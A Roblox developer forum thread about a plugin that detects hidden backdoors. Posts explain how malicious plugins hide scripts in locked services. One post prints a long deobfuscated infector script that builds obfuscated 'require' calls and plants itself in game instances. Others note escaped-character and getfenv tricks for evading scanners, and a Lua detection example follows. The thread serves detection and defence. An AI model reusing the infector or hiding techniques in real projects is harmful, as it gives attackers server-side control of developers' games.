V2.1 - Plugin: Hidden Backdoor/Infection Script Detector (Detects/Removes infections from malicious plugins)


#63

I ran it and it found a script as a virus (it wasn’t so I just ignored it), but then if I scan again the scan icon keeps loading and never finds anything so it just runs for eternity. Is that supposed to happen if it finds nothing? Why not make a prompt saying that it found nothing instead of running for eternity?

edit: it appears a few times it will say Infecton not found, but other times it will run for eternity (it’s been 30 minutes, there’s no way it’s still scanning)


#64

Unfortunately that doesn’t work for descendants of RobloxScript locked instances because they inherit the permission of their parent.


#65

Plugins can access RobloxLocked instances? Didn’t know that… :frowning:


#66

The way RobloxLocked instances work is kind of funny, actually. You can get a reference to an object through whatever means (usually GetService or FindFirstChild) and do whatever you want with it, including setting the parent of something to it, but if it’s RobloxLocked you can’t index it directly.

Plugins can access normal RobloxLocked Instances like the CoreGui just fine, but stuff like the CSGDictionaryService requires elevated permissions so you can’t directly index them. That’s why this plugin is a thing to begin with. I mentioned RobloxScript locked specifically because of this weirdness.

I have a bit of a more in-depth explanation for permissions here if you’re interested. It’s mostly unrelated but it defines script permissions and what RobloxScript means.


#67

They can’t access them or their children through normal means (i.e. game:GetService("CSGDictionaryService"):GetChildren() will error) but you can set something’s parent to them (i.e. local Test=Instance.new("Script") Test.Source="--No print plz" print("Changed source") Test.Parent = game:GetService("CSGDictionaryService") print("Parented to RL object") wait() Test.Source="--Whoops, this won't work since it is now a descendant of a RL script context level 6 parent" will change the source (to stop an unremovable Hello world console print) then parent the new script to the RL service but by doing so it will lose access to indexing or otherwise altering the script.) This is an engine permissions glitch that Roblox intends to correct, but for now a lot of malicious plugins are abusing this to inject backdoors into protected services in order to hide them from the developer and gain server-side execution access for them to execute whatever they’d like into the developer’s game.


#68

I’m having a concerning problem, and without this plugin I don’t think I would’ve found it. Every time I start a new game in Studio and run a virus scan it always detects 2 infections. This can even be a baseplate and it still detects it. So what happens now? Is my Roblox infected or something? How can I get rid of those two viruses?


#69

Check your plugins, try removing them one by one and seeing which you have to disable to stop this plugin from detecting them.


#70

Ah that fixed it, thanks. I found a phony Plugin and got rid of it and the viruses don’t pop up anymore. I still have a problem of being unable to show a DestroyedMenu though. I don’t know whether it was because of a bad plugin or if Roblox Studio was missing some files. Here’s my output when I right click on assets from the ToolBox.

16:25:45.061 - Unable to show a destroyed menu
16:25:45.062 - Stack Begin
16:25:45.062 - Script ‘Plugin_-1.Plugin.Core.Components.Asset.Asset’, Line 152 - field method
16:25:45.062 - Script ‘Plugin_-1.Plugin.Libs.Roact.SingleEventManager’, Line 41
16:25:45.064 - Stack End


#71

That’s a bug with the ToolBox plugin. Nothing to be done about it for the moment. :slightly_smiling_face:


#72

So it’s a Roblox update issue? Wow here I was trying to backtrack my 100 plugins.


#73

Yup. Just a bug with Roblox for the moment.


#74

I’ve already posted a bug report here; if you like the post, it will show support, and it is more likely to be noticed by staff if not already.

Also yeah, I was confused at the error at first as well.


#75

I did this on Boho Salon too and I decided to store it on the old version, then I updated and it’s just been running on and on and I know it’s still there as I checked for myself in the XML file.


#76

Lately whenever I press the Scan for Infection button, nothing really happens. The spinning circle icon doesn’t appear again, and no errors, warnings, nor other messages appear in the console. I’ve already tried reinstalling the plugin to no avail. What should I do?


#77

If you’re going to search for backdoors by checking source code for the phrase "require", then add "\114\101\113\117\105\114\101" to your conditional, as it’s a common way to obfuscate "require".


#78

The icon doesn’t change due to an update from ROBLOX. I’ll likely be putting a GUI in to show the status of the scan now.


#79

I never enable loadstring though


#80

I have deobfuscated the main infector script that is injected via most of these plugins - if you would like to take a look, enjoy:

--Deobfuscated by MSandbox v1.0.0 by 3dsboy08 (static-obfax)

local L_1_, L_2_, L_3_, L_4_, L_5_, L_6_, L_7_, L_8_, L_9_, L_10_, L_11_, L_12_, L_13_, L_14_, L_15_, L_16_, L_17_, L_18_, L_19_, L_20_, L_21_, L_22_, L_23_, L_24_, L_25_, L_26_, L_27_, L_28_, L_29_, L_30_, L_31_, L_32_, L_33_, L_34_, L_35_, L_36_, L_37_, L_38_, L_39_, L_40_, L_41_, L_42_, L_43_, L_44_, L_45_, L_46_, L_47_, L_48_
L_1_ = newproxy
L_2_ = true
L_1_ = L_1_(L_2_)
L_2_ = getmetatable
L_3_ = L_1_
L_2_ = L_2_(L_3_)
function L_3_(L_49_arg1, L_50_arg2)
	local L_51_
	if L_50_arg2 == "lshift" then
		function L_51_(L_52_arg1, L_53_arg2)
			local L_54_
			L_54_ = 2 ^ L_53_arg2
			L_54_ = L_52_arg1 * L_54_
			return L_54_
		end
		return L_51_
	elseif L_50_arg2 == "rshift" then
		function L_51_(L_55_arg1, L_56_arg2)
			return math.floor(L_55_arg1 / 2 ^ L_56_arg2)
		end
		return L_51_
	elseif L_50_arg2 == "_gbc" then
		function L_51_(L_57_arg1)
			while L_57_arg1 > 1 do
				L_57_arg1 = _UPVALUE0_.rshift(L_57_arg1, 1)
			end
			return 2
		end
		return L_51_
	elseif L_50_arg2 == "xor" then
		function L_51_(L_58_arg1, L_59_arg2)
			local L_60_, L_61_, L_62_, L_63_, L_64_, L_65_
			L_60_ = math
			L_60_ = L_60_.max
			L_61_ = _UPVALUE0_
			L_61_ = L_61_._gbc
			L_61_ = L_61_(L_62_)
			L_65_ = L_62_(L_63_)
			L_60_ = L_60_(L_61_, L_62_, L_63_, L_64_, L_65_, L_62_(L_63_))
			L_61_ = {}
			for L_66_forvar1 = 0, L_60_ - 1 do
				L_61_[L_60_ - L_66_forvar1] = _UPVALUE0_._gbc(L_58_arg1, L_66_forvar1, 1) ~= _UPVALUE0_._gbc(L_59_arg2, L_66_forvar1, 1) and 1 or 0
			end
			L_65_ = ""
			return L_62_(L_63_, L_64_)
		end
		return L_51_
	end
end
L_2_.__index = L_3_
L_2_ = newproxy
L_3_ = true
L_2_ = L_2_(L_3_)
L_3_ = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
L_4_ = {
	L_5_,
	L_6_,
	L_7_,
	L_8_,
	L_9_,
	L_10_,
	L_11_,
	L_12_,
	L_13_,
	L_14_,
	L_15_,
	L_16_,
	L_17_,
	L_18_,
	L_19_,
	L_20_
}
L_5_ = "\197\147"
L_6_ = "\226\136\145"
L_7_ = "\194\174"
L_11_ = "\226\136\154"
L_12_ = "\226\136\171"
L_13_ = "\203\154"
L_17_ = "\194\170"
L_18_ = "\194\186"
L_19_ = "\226\128\147"
L_20_ = "\226\137\160"
L_5_ = getmetatable
L_6_ = L_2_
L_5_ = L_5_(L_6_)
function L_6_(L_67_arg1, L_68_arg2)
	local L_69_
	if L_68_arg2 == "encode" then
		function L_69_(L_70_arg1)
			return (L_70_arg1:gsub(".", function(L_71_arg1)
				local L_72_
				L_72_ = ""
				for L_73_forvar1 = 8, 1, -1 do
					L_72_ = L_72_ .. (L_71_arg1:byte() % 2 ^ L_73_forvar1 - L_71_arg1:byte() % 2 ^ (L_73_forvar1 - 1) > 0 and "1" or "0")
				end
				return L_72_
			end) .. "0000"):gsub("%d%d%d?%d?%d?%d?", function(L_74_arg1)
				local L_75_, L_76_, L_77_, L_78_, L_79_
				L_75_ = #L_74_arg1
				if L_75_ < 6 then
					L_75_ = ""
					return L_75_
				end
				L_75_ = 0
				for L_80_forvar1 = 1, 6 do
					L_75_ = L_75_ + (L_74_arg1:sub(L_80_forvar1, L_80_forvar1) == "1" and 2 ^ (6 - L_80_forvar1) or 0)
				end
				L_79_ = L_75_ + 1
				return L_76_(L_77_, L_78_, L_79_)
			end) .. ({
				"",
				"",
				""
			})[#L_70_arg1 % 3 + 1]
		end
		return L_69_
	elseif L_68_arg2 == "decode" then
		function L_69_(L_81_arg1)
			L_81_arg1 = string.gsub(L_81_arg1, "[^" .. _UPVALUE0_ .. "=]", "")
			return (L_81_arg1:gsub(".", function(L_82_arg1)
				local L_83_
				if L_82_arg1 == "=" then
					L_83_ = ""
					return L_83_
				end
				L_83_ = ""
				for L_84_forvar1 = 6, 1, -1 do
					L_83_ = L_83_ .. ((_UPVALUE0_:find(L_82_arg1) - 1) % 2 ^ L_84_forvar1 - (_UPVALUE0_:find(L_82_arg1) - 1) % 2 ^ (L_84_forvar1 - 1) > 0 and "1" or "0")
				end
				return L_83_
			end):gsub("%d%d%d?%d?%d?%d?%d?%d?", function(L_85_arg1)
				local L_86_, L_87_, L_88_, L_89_, L_90_
				L_86_ = #L_85_arg1
				if L_86_ ~= 8 then
					L_86_ = ""
					return L_86_
				end
				L_86_ = 0
				for L_91_forvar1 = 1, 8 do
					L_86_ = L_86_ + (L_85_arg1:sub(L_91_forvar1, L_91_forvar1) == "1" and 2 ^ (8 - L_91_forvar1) or 0)
				end
				return L_87_(L_88_)
			end))
		end
		return L_69_
	end
end
L_5_.__index = L_6_
L_5_ = newproxy
L_6_ = true
L_5_ = L_5_(L_6_)
L_6_ = getmetatable
L_7_ = L_5_
L_6_ = L_6_(L_7_)
function L_7_(L_92_arg1, L_93_arg2)
	local L_94_
	if L_93_arg2 == "split" then
		function L_94_(L_95_arg1, L_96_arg2)
			local L_97_, L_98_, L_99_, L_100_, L_101_
			L_97_ = {}
			L_101_ = L_96_arg2
			for L_102_forvar1 in L_98_(L_99_, L_100_) do
				table.insert(L_97_, L_102_forvar1)
			end
			return L_97_
		end
		return L_94_
	elseif L_93_arg2 == "die" then
		function L_94_()
			local L_103_, L_104_
			while true do
			end
		end
		return L_94_
	end
end
L_6_.__index = L_7_
L_6_ = game
L_7_ = L_6_
L_6_ = L_6_.WaitForChild
L_6_(L_7_, L_8_)
L_6_ = game
L_6_ = L_6_.ChildAdded
L_7_ = L_6_
L_6_ = L_6_.connect
L_6_(L_7_, L_8_)
L_6_ = game
L_6_ = L_6_.Workspace
L_6_ = L_6_.ChildAdded
L_7_ = L_6_
L_6_ = L_6_.connect
L_6_(L_7_, L_8_)
L_6_ = {
	L_7_,
	L_8_,
	L_9_,
	L_10_,
	L_11_,
	L_12_,
	L_13_
}
L_7_ = "\229\135\137"
L_11_ = "\195\140\194\191\226\128\162"
L_12_ = "\231\148\159"
L_13_ = "\194\191"
L_7_ = {}
for L_105_forvar1 = 48, 57 do
	L_12_ = table
	L_12_ = L_12_.insert
	L_13_ = L_7_
	L_48_ = L_14_(L_15_)
	L_12_(L_13_, L_14_, L_15_, L_16_, L_17_, L_18_, L_19_, L_20_, L_21_, L_22_, L_23_, L_24_, L_25_, L_26_, L_27_, L_28_, L_29_, L_30_, L_31_, L_32_, L_33_, L_34_, L_35_, L_36_, L_37_, L_38_, L_39_, L_40_, L_41_, L_42_, L_43_, L_44_, L_45_, L_46_, L_47_, L_48_, L_14_(L_15_))
end
for L_106_forvar1 = 65, 90 do
	L_12_ = table
	L_12_ = L_12_.insert
	L_13_ = L_7_
	L_48_ = L_14_(L_15_)
	L_12_(L_13_, L_14_, L_15_, L_16_, L_17_, L_18_, L_19_, L_20_, L_21_, L_22_, L_23_, L_24_, L_25_, L_26_, L_27_, L_28_, L_29_, L_30_, L_31_, L_32_, L_33_, L_34_, L_35_, L_36_, L_37_, L_38_, L_39_, L_40_, L_41_, L_42_, L_43_, L_44_, L_45_, L_46_, L_47_, L_48_, L_14_(L_15_))
end
for L_107_forvar1 = 97, 122 do
	L_12_ = table
	L_12_ = L_12_.insert
	L_13_ = L_7_
	L_48_ = L_14_(L_15_)
	L_12_(L_13_, L_14_, L_15_, L_16_, L_17_, L_18_, L_19_, L_20_, L_21_, L_22_, L_23_, L_24_, L_25_, L_26_, L_27_, L_28_, L_29_, L_30_, L_31_, L_32_, L_33_, L_34_, L_35_, L_36_, L_37_, L_38_, L_39_, L_40_, L_41_, L_42_, L_43_, L_44_, L_45_, L_46_, L_47_, L_48_, L_14_(L_15_))
end
L_11_ = 900000
L_11_ = L_10_
L_12_ = "HttpService"
L_11_ = L_10_
L_12_ = true
L_11_ = game
L_12_ = L_11_
L_11_ = L_11_.GetService
L_13_ = "HttpService"
L_11_ = L_11_(L_12_, L_13_)
L_12_ = L_11_
L_11_ = L_11_.GenerateGUID
L_13_ = false
L_11_ = L_11_(L_12_, L_13_)
function L_12_(L_108_arg1)
	local L_109_, L_110_
	L_109_ = math
	L_109_ = L_109_.randomseed
	L_110_ = tick
	L_110_ = L_110_()
	L_109_(L_110_, L_110_())
	L_109_ = {}
	L_110_ = math
	L_110_ = L_110_.random
	for L_111_forvar1 = 1, #L_108_arg1 do
		if (L_111_forvar1 - 1) * L_110_() - (L_111_forvar1 - 1) * L_110_() % 1 == L_111_forvar1 - 1 then
			L_109_[#L_109_ + 1] = L_108_arg1[L_111_forvar1]
		else
			L_109_[#L_109_ + 1] = L_109_[(L_111_forvar1 - 1) * L_110_() - (L_111_forvar1 - 1) * L_110_() % 1 + 1]
			L_109_[(L_111_forvar1 - 1) * L_110_() - (L_111_forvar1 - 1) * L_110_() % 1 + 1] = L_108_arg1[L_111_forvar1]
		end
	end
	return L_109_
end
G_1_ = L_12_
function L_12_(L_112_arg1, L_113_arg2, L_114_arg3)
	local L_115_, L_116_, L_117_, L_118_
	L_115_ = string
	L_115_ = L_115_.find
	L_116_ = L_112_arg1
	L_117_ = L_113_arg2
	L_116_ = L_115_(L_116_, L_117_)
	L_117_ = string
	L_117_ = L_117_.sub
	L_118_ = L_112_arg1
	L_117_ = L_117_(L_118_, 1, L_115_ - 1)
	L_118_ = string
	L_118_ = L_118_.sub
	L_118_ = L_118_(L_112_arg1, L_116_ + 1, string.len(L_112_arg1))
	return L_117_ .. L_114_arg3 .. L_118_
end
G_2_ = L_12_
function L_12_(L_119_arg1)
end
G_3_ = L_12_
L_12_ = {}
G_4_ = L_12_
L_12_ = Instance
L_12_ = L_12_.new
L_13_ = "Backpack"
L_12_ = L_12_(L_13_)
L_13_ = Instance
L_13_ = L_13_.new
L_13_ = L_13_(L_14_, L_15_)
if L_14_ ~= 7368818 then
	if L_14_ ~= 998796 then
		for L_120_forvar1 = 1, 20 do
			L_18_ = Instance
			L_18_ = L_18_.new
			L_19_ = "StringValue"
			L_20_ = L_13_
			L_18_ = L_18_(L_19_, L_20_)
			L_3_ = L_18_
			L_13_ = L_3_
		end
	end
end
G_5_ = L_14_
G_6_ = L_14_
G_7_ = L_14_
L_12_.Parent = L_14_
L_17_ = 5
L_17_ = #L_6_
L_17_ = math
L_17_ = L_17_.random
L_18_ = 1
L_19_ = 30000
L_17_ = L_17_(L_18_, L_19_)
L_18_ = math
L_18_ = L_18_.random
L_19_ = #L_6_
L_18_ = L_18_(L_19_)
L_18_ = L_6_[L_18_]
L_19_ = math
L_19_ = L_19_.random
L_20_ = #L_6_
L_19_ = L_19_(L_20_)
L_19_ = L_6_[L_19_]
L_20_ = math
L_20_ = L_20_.random
L_21_ = #L_6_
L_20_ = L_20_(L_21_)
L_20_ = L_6_[L_20_]
L_14_.Name = L_15_
L_17_ = 5
L_17_ = #L_6_
L_17_ = math
L_17_ = L_17_.random
L_18_ = 1
L_19_ = 30000
L_17_ = L_17_(L_18_, L_19_)
L_18_ = math
L_18_ = L_18_.random
L_19_ = #L_6_
L_18_ = L_18_(L_19_)
L_18_ = L_6_[L_18_]
L_19_ = math
L_19_ = L_19_.random
L_20_ = #L_6_
L_19_ = L_19_(L_20_)
L_19_ = L_6_[L_19_]
L_20_ = math
L_20_ = L_20_.random
L_21_ = #L_6_
L_20_ = L_20_(L_21_)
L_20_ = L_6_[L_20_]
L_14_.Name = L_15_
L_17_ = 5
L_17_ = #L_6_
L_17_ = math
L_17_ = L_17_.random
L_18_ = 1
L_19_ = 30000
L_17_ = L_17_(L_18_, L_19_)
L_18_ = math
L_18_ = L_18_.random
L_19_ = #L_6_
L_18_ = L_18_(L_19_)
L_18_ = L_6_[L_18_]
L_19_ = math
L_19_ = L_19_.random
L_20_ = #L_6_
L_19_ = L_19_(L_20_)
L_19_ = L_6_[L_19_]
L_20_ = math
L_20_ = L_20_.random
L_21_ = #L_6_
L_20_ = L_20_(L_21_)
L_20_ = L_6_[L_20_]
L_14_.Name = L_15_
L_17_ = 1
L_18_ = 30000
L_17_ = math
L_17_ = L_17_.random
L_18_ = #L_6_
L_17_ = L_17_(L_18_)
L_17_ = L_6_[L_17_]
L_18_ = math
L_18_ = L_18_.random
L_19_ = #L_6_
L_18_ = L_18_(L_19_)
L_18_ = L_6_[L_18_]
L_19_ = math
L_19_ = L_19_.random
L_20_ = #L_6_
L_19_ = L_19_(L_20_)
L_19_ = L_6_[L_19_]
L_12_.Name = L_14_
L_17_ = 4
L_17_ = L_8_
L_18_ = 5
L_17_ = L_17_(L_18_)
L_17_ = "i"
L_18_ = L_8_
L_19_ = 6
L_18_ = L_18_(L_19_)
L_17_ = L_17_ .. L_18_
L_18_ = "i"
L_19_ = L_8_
L_20_ = 7
L_19_ = L_19_(L_20_)
L_18_ = L_18_ .. L_19_
L_19_ = "i"
L_20_ = L_8_
L_21_ = 8
L_20_ = L_20_(L_21_)
L_19_ = L_19_ .. L_20_
L_20_ = "i"
L_21_ = L_8_
L_22_ = 9
L_21_ = L_21_(L_22_)
L_20_ = L_20_ .. L_21_
L_21_ = "i"
L_22_ = L_8_
L_23_ = 10
L_22_ = L_22_(L_23_)
L_21_ = L_21_ .. L_22_
L_22_ = "i"
L_23_ = L_8_
L_24_ = 11
L_23_ = L_23_(L_24_)
L_22_ = L_22_ .. L_23_
L_23_ = "i"
L_24_ = L_8_
L_25_ = 12
L_24_ = L_24_(L_25_)
L_23_ = L_23_ .. L_24_
L_24_ = "i"
L_25_ = L_8_
L_26_ = 13
L_25_ = L_25_(L_26_)
L_24_ = L_24_ .. L_25_
L_25_ = "i"
L_26_ = L_8_
L_27_ = 14
L_26_ = L_26_(L_27_)
L_25_ = L_25_ .. L_26_
L_26_ = "i"
L_27_ = L_8_
L_28_ = 15
L_27_ = L_27_(L_28_)
L_26_ = L_26_ .. L_27_
L_27_ = "i"
L_28_ = L_8_
L_29_ = 16
L_28_ = L_28_(L_29_)
L_27_ = L_27_ .. L_28_
L_28_ = "i"
L_29_ = L_8_
L_30_ = 18
L_29_ = L_29_(L_30_)
L_28_ = L_28_ .. L_29_
L_29_ = "i"
L_30_ = L_8_
L_31_ = 3
L_30_ = L_30_(L_31_)
L_29_ = L_29_ .. L_30_
L_30_ = "i"
L_31_ = L_8_
L_32_ = 4
L_31_ = L_31_(L_32_)
L_30_ = L_30_ .. L_31_
L_31_ = "i"
L_32_ = L_8_
L_33_ = 5
L_32_ = L_32_(L_33_)
L_31_ = L_31_ .. L_32_
L_32_ = "i"
L_33_ = L_8_
L_34_ = 6
L_33_ = L_33_(L_34_)
L_32_ = L_32_ .. L_33_
L_33_ = "i"
L_34_ = L_8_
L_35_ = 7
L_34_ = L_34_(L_35_)
L_33_ = L_33_ .. L_34_
L_34_ = "i"
L_35_ = L_8_
L_36_ = 8
L_35_ = L_35_(L_36_)
L_34_ = L_34_ .. L_35_
L_35_ = "i"
L_36_ = L_8_
L_37_ = 5
L_36_ = L_36_(L_37_)
L_35_ = L_35_ .. L_36_
L_36_ = "i"
L_37_ = L_8_
L_38_ = 9
L_37_ = L_37_(L_38_)
L_36_ = L_36_ .. L_37_
L_37_ = "i"
L_38_ = L_8_
L_39_ = 5
L_38_ = L_38_(L_39_)
L_37_ = L_37_ .. L_38_
L_38_ = "i"
L_39_ = L_8_
L_40_ = 4
L_39_ = L_39_(L_40_)
L_38_ = L_38_ .. L_39_
L_39_ = "i"
L_40_ = L_8_
L_41_ = 3
L_40_ = L_40_(L_41_)
L_39_ = L_39_ .. L_40_
L_40_ = "i"
L_41_ = L_8_
L_42_ = 4
L_41_ = L_41_(L_42_)
L_40_ = L_40_ .. L_41_
L_41_ = "i"
L_42_ = L_8_
L_43_ = 6
L_42_ = L_42_(L_43_)
L_41_ = L_41_ .. L_42_
L_42_ = "i"
L_43_ = L_8_
L_44_ = 7
L_43_ = L_43_(L_44_)
L_42_ = L_42_ .. L_43_
L_43_ = {
	L_44_,
	L_45_,
	L_46_,
	L_47_,
	L_48_,
	"i" .. L_8_(5) .. " = require ",
	"i" .. L_8_(7) .. " = 'GetService' ",
	"i" .. L_8_(4) .. " = 'FindFirstChild' ",
	"i" .. L_8_(14) .. " = 'Description' ",
	"i" .. L_8_(16) .. " = 'GetProductInfo' ",
	"i" .. L_8_(4) .. " = 'Workspace' ",
	"i" .. L_8_(7) .. " = 'ReplicatedStorage' ",
	"i" .. L_8_(4) .. " = 'PlaceId' ",
	"i" .. L_8_(10) .. " = math.sqrt ",
	"i" .. L_8_(10) .. " = 'IsStudio' ",
	"i" .. L_8_(10) .. " = 'SSM' ",
	"i" .. L_8_(10) .. " = 'MarketplaceService' ",
	"i" .. L_8_(10) .. " = 'WaitForChild' ",
	"i" .. L_8_(10) .. " = 'RunService' ",
	"i" .. L_8_(10) .. " = pcall "
}
L_44_ = "i"
L_45_ = L_8_
L_46_ = 5
L_45_ = L_45_(L_46_)
L_46_ = " = 'Debris' "
L_44_ = L_44_ .. L_45_ .. L_46_
L_45_ = "i"
L_46_ = L_8_
L_47_ = 3
L_46_ = L_46_(L_47_)
L_47_ = " = game "
L_45_ = L_45_ .. L_46_ .. L_47_
L_46_ = "i"
L_47_ = L_8_
L_48_ = 8
L_47_ = L_47_(L_48_)
L_48_ = " = 'test' "
L_46_ = L_46_ .. L_47_ .. L_48_
L_47_ = "i"
L_48_ = L_8_
L_48_ = L_48_(5)
L_47_ = L_47_ .. L_48_ .. " = 'Name' "
L_48_ = "i"
L_48_ = L_48_ .. L_8_(10) .. " = 'ClassName' "
L_44_ = math
L_44_ = L_44_.random
L_45_ = 1
L_46_ = 200
L_44_ = L_44_(L_45_, L_46_)
L_45_ = {
	L_46_,
	L_47_,
	L_48_,
	L_14_ .. " = " .. 2655056793 / L_44_ .. " * " .. L_44_ .. " ",
	L_34_ .. " = 'load' ",
	L_35_ .. " = game ",
	L_23_ .. " = 'PlaceId' ",
	L_20_ .. " = 'RunService' ",
	L_21_ .. " = 'IsStudio' "
}
L_46_ = L_42_
L_47_ = " = spawn "
L_46_ = L_46_ .. L_47_
L_47_ = L_25_
L_48_ = " = pcall "
L_47_ = L_47_ .. L_48_
L_48_ = L_22_
L_48_ = L_48_ .. " = require "
L_46_ = {
	L_47_,
	L_48_,
	L_38_ .. " = 'FindFirstChild' ",
	L_26_ .. " = getfenv ",
	L_39_ .. " = '?' ",
	L_41_ .. " = " .. L_40_ .. ".char ",
	L_36_ .. " = 'slo' ",
	L_35_ .. " = game ",
	L_23_ .. " = 'PlaceId' ",
	L_25_ .. " = pcall ",
	L_20_ .. " = 'RunService' ",
	L_21_ .. " = 'IsStudio' "
}
L_47_ = L_17_
L_48_ = " = 'GetService' "
L_47_ = L_47_ .. L_48_
L_48_ = L_18_
L_48_ = L_48_ .. " = 'Debris' "
L_47_ = {
	L_48_,
	101,
	113,
	117,
	105,
	114,
	101
}
L_48_ = 114
L_48_ = 5
L_48_ = math.random(1, 100000000)
for L_121_forvar1 = 1, #L_47_ do
	L_47_[L_121_forvar1] = L_47_[L_121_forvar1] * L_48_
end
L_45_ = G_1_(L_45_)
L_46_ = G_1_(L_46_)
G_8_ = ""
G_9_ = ""
L_43_ = G_1_(L_43_)
for L_122_forvar1 = 1, #L_45_ do
	G_9_ = G_9_ .. L_43_[L_122_forvar1] .. L_45_[L_122_forvar1]
end
L_43_ = G_1_(L_43_)
for L_123_forvar1 = 1, #L_46_ do
	G_8_ = G_8_ .. L_43_[L_123_forvar1] .. L_46_[L_123_forvar1]
end
Instance.new("Script").Source = L_40_ .. " = string " .. G_8_ .. " if " .. L_35_ .. "[" .. L_17_ .. "](" .. L_35_ .. ", " .. L_20_ .. ")[" .. L_21_ .. "](" .. L_35_ .. "[" .. L_17_ .. "](" .. L_35_ .. ", " .. L_20_ .. "))then return end;" .. L_25_ .. "(function() " .. " if " .. L_35_ .. "[" .. L_17_ .. "](" .. L_35_ .. ", " .. L_18_ .. ")[" .. L_38_ .. "](" .. L_35_ .. "[" .. L_17_ .. "](" .. L_35_ .. ", " .. L_18_ .. "), " .. L_39_ .. ") then " .. L_26_ .. "()[" .. L_41_ .. "(" .. L_47_[1] .. " / " .. L_48_ .. ") .. " .. L_41_ .. "(" .. L_47_[2] .. " / " .. L_48_ .. ") .. " .. L_41_ .. "(" .. L_47_[3] .. " / " .. L_48_ .. ") .. " .. L_41_ .. "(" .. L_47_[4] .. " / " .. L_48_ .. ") .. " .. L_41_ .. "(" .. L_47_[5] .. " / " .. L_48_ .. ") .. " .. L_41_ .. "(" .. L_47_[6] .. " / " .. L_48_ .. ") .. " .. L_41_ .. "(" .. L_47_[7] .. " / " .. L_48_ .. ")](" .. L_35_ .. "[" .. L_17_ .. "](" .. L_35_ .. ", " .. L_18_ .. ")[" .. L_38_ .. "](" .. L_35_ .. "[" .. L_17_ .. "](" .. L_35_ .. ", " .. L_18_ .. "), " .. L_39_ .. "))[" .. L_36_ .. "](" .. L_35_ .. "[" .. L_23_ .. "]) end end)"
Instance.new("Script").Name = math.random(3, 5) .. L_6_[math.random(#L_6_)] .. math.random(1, 30000) .. L_6_[math.random(#L_6_)] .. L_6_[math.random(#L_6_)] .. L_6_[math.random(#L_6_)]
pcall(function()
	local L_124_
	L_124_ = _UPVALUE0_
	L_124_.Parent = game.NonReplicatedCSGDictionaryService
end)
if game.CreatorId ~= 7368818 and game.CreatorId ~= 998796 then
	pcall(function()
		spawn(function()
			game:WaitForChild("ServerScriptService")
			wait(1)
			G_10_ = game:GetService("Workspace"):GetDescendants()
			G_11_ = game:GetService("StarterGui"):GetDescendants()
			G_12_ = game:GetService("ServerScriptService"):GetDescendants()
			if #G_10_ >= 30 and #G_11_ >= 2 then
				if game:GetService("Debris"):FindFirstChild("?") then
					game:GetService("Debris"):FindFirstChild("?"):remove()
				end
				if not game:GetService("Debris"):FindFirstChild("?") then
					script:WaitForChild("?"):Clone().Parent = game:GetService("Debris")
				end
				if not G_10_[math.random(#G_10_)]:IsA("Camera") and not G_10_[math.random(#G_10_)]:IsA("Terrain") then
					_UPVALUE0_.Parent = G_10_[math.random(#G_10_)]
				end
			end
			if #G_12_ >= 2 then
				G_3_(_UPVALUE1_)
			end
		end)
	end)
end

Please note that floating point errors made by the obfuscator were removed - I have a previous version that still has these floating point errors for reference.

Also note that the deobfuscation quality isn’t that great due to debugging information being removed. If anyone would like to beautify this further, go ahead.

The obfuscator used was VM based, and I might make a more specific post on how I deobfuscated this in the future. Stay tuned.


#82

Doesn’t matter. Apparently you can use getfenv with that string and it’ll parse into “require” and work as if the script they injected said “require(x)” to begin with. Synapse Xen obfuscates code this way, and so do a handful of other scripts with obfuscated backdoors.
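
The two points above (the escaped spelling from post #77 and the getfenv lookup from post #82), as an added example that is not part of the original thread or of the plugin's code: a source scanner in plain Lua that decodes `\ddd` and `\xHH` escapes before matching, and also flags the structural signs that remain when the name is built at run time. The function names, rule names and sample strings are constructed for illustration.

```lua
-- Added example (not the plugin's code). Plain Lua 5.1 / Luau string functions only.

-- Decode \ddd and \xHH escapes so "\114\101\113\117\105\114\101" reads as text.
-- Applied to the whole source, not only to string literals: an over-approximation
-- that is acceptable for a scanner whose hits are reviewed by a person.
local function decodeEscapes(source)
	local out = source:gsub("\\x(%x%x)", function(hex)
		return string.char(tonumber(hex, 16))
	end)
	out = out:gsub("\\(%d%d?%d?)", function(dec)
		local n = tonumber(dec)
		if n <= 255 then
			return string.char(n)
		end
		-- returning nothing keeps the original text (not a valid byte escape)
	end)
	return out
end

-- Structural rules (Lua patterns), checked on the decoded text.
local RULES = {
	-- getfenv()[expr]: a global fetched by a computed name
	{ name = "getfenv-index", pattern = "getfenv%s*%b()%s*%[" },
	-- x = getfenv: the function is aliased so later calls do not show its name
	{ name = "getfenv-alias", pattern = "=%s*getfenv[^%w_%(]" },
	-- x = y.char: string.char aliased, typically to assemble names from codes
	{ name = "char-alias", pattern = "=%s*[%w_]+%s*%.%s*char[^%w_%(]" },
}

-- Returns a list of rule names that matched the given script source.
local function scanSource(source)
	local findings = {}
	-- trailing newline lets the [^%w_%(] guards match at end of input
	local decoded = decodeEscapes(source) .. "\n"
	if source:find("require", 1, true) then
		findings[#findings + 1] = "literal-require"
	elseif decoded:find("require", 1, true) then
		findings[#findings + 1] = "escaped-require"
	end
	for _, rule in ipairs(RULES) do
		if decoded:find(rule.pattern) then
			findings[#findings + 1] = rule.name
		end
	end
	return findings
end

-- Constructed sample sources (not taken from any real plugin).
local SAMPLES = {
	{ "plain",   [=[local cfg = require(script.Parent.Config)]=] },
	{ "escaped", [=[local f = getfenv()["\114\101\113\117\105\114\101"]]=] },
	{ "aliased", [=[a = string b = a.char c = getfenv c()[b(114) .. b(101)]]=] },
}

for _, sample in ipairs(SAMPLES) do
	print(sample[1], table.concat(scanSource(sample[2]), ", "))
end
```

The "aliased" sample contains neither the word nor an escape, which is the shape the generator in post #80 emits (character codes multiplied by a random factor and divided back at run time), so only the structural rules report it. These are heuristics and every hit still needs manual review.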


#83

I don’t know if it’s something I’m doing but the scanning seems inconsistent for me. Sometimes the scan works and prints in the output what it has done but other times it doesn’t do anything at all (even on a blank baseplate with very few instances). It used to scan just fine a week ago and worked every time but now it doesn’t, or at least most of the time.

I’ve tried re-installing the plugin and changing settings.

Here is an error I got once: